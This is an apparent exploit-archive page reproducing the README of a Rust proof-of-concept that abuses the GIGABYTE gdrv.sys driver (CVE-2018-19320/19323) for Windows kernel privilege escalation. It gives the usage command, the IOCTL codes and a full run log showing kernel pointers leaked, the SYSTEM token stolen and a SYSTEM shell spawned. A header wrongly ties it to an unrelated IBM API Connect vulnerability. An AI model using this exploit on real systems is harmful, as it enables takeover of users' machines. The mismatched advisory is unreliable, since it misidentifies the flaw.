关联漏洞
标题:IBM API Connect 安全漏洞 (CVE-2018-1932)Description:IBM API Connect(又名APIConnect)是美国IBM公司的一套用于管理API生命周期的集成解决方案。该方案支持创建、运行、管理和保护API和微服务等。 IBM API Connect 5.0.0.0版本至5.0.8.4版本中的管理服务器的基于角色的访问控制功能存在安全漏洞。攻击者可利用该漏洞获取高度敏感的信息。
Description
Rust POC for CVE-2018-1932X kernel driver vulnerabilities
介绍
# CVE-2018-1932X ( Rust Exploit POC) for GIGABYTE APP Center v1.05.21 and earlier
> Just because your target is memory unsafe doesn't mean your exploit has to be!
Vulnerabilities used :
* [CVE-2018-19320](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-19320) - ring0 memcpy-like functionality
* [CVE-2018-19323](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-19323) - read and write Machine Specific Registers (MSRs).
Tested on:
* 20H1: `Windows 10 Kernel Version 19041 MP (1 procs) Free x64`
## References
* [Vergilius Project: Kernel Structs](https://www.vergiliusproject.com/kernels/x64/Windows%2010%20|%202016/2004%2020H1%20(May%202020%20Update))
* [Gigabyte Patch Announcement](https://www.gigabyte.com/Support/Security/1801)
* [_KPCR Details](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/amd64_x/kpcr.htm)
## Requirements
* x64 only
* Tested Build #'s above
* Loaded GIGABYTE Driver: [gdrv.sys](driver/gdrv.sys)
## Usage
`.\CVE-2018-1932X.exe`
## Example
```
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X
Opening Handle to Kernel Driver: \\.\GIO
Acquired Handle: 0xa8
Sending IOCTL: 0xc3502580 with 0x10 bytes of data
[+] Leaked _KPCR: ffffe48159d88000
[*] Address _KPCRB: ffffe48159d88020
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KPRCB: ffffe48159d88180
[*] Address _KTHREAD: ffffe48159d88188
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KTHREAD: ffffb50b14d16080
[*] Address _KPROCESS: ffffb50b14d162a0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _KPROCESS: ffffb50b1507f080
[*] Address PID: ffffb50b1507f4c0
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked PID: 2092
[+] Known PID: 2092
Walking Active Process Links...
[*] Address ActiveProcessLinks.Flink: ffffb50b1507f4c8 (PID: 82c)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _EPROCESS: fffff8015561e060 (PID: 0)
[*] Address ActiveProcessLinks.Flink: fffff8015561e060 (PID: 0)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Leaked _EPROCESS: ffffb50b100624c8 (PID: 4)
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Current Token: ffff9708cac8306e
[+] System Token: ffff9708c567b047
Borrowing SYSTEM Token...
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
Sending IOCTL: 0xc3502808 with 0x14 bytes of data
[+] Current Token: ffff9708c567b047
Spawning Process...
[+] Spawned SYSTEM Process
Closing Handle to Kernel Driver: \\.\GIO
```
Spawned Powershell:
```
PS C:\> whoami
nt authority\system
```
## Vulnerable Blocks
### Memcpy (IOCTL 0x0C3502808)
### MSR Manipulation (IOCTL 0x0C3502580)
文件快照
[4.0K] /data/pocs/283ba9e599ac3bb8f59a0b570f2f9e898022f98b
├── [ 226] Cargo.toml
├── [4.0K] docs
│ ├── [ 72K] memcpy_blocks.png
│ └── [ 50K] msr_blocks.png
├── [4.0K] driver
│ └── [ 26K] gdrv.sys
├── [2.9K] README.md
└── [4.0K] src
├── [2.1K] gio.rs
├── [2.0K] kdriver.rs
└── [4.6K] main.rs
3 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。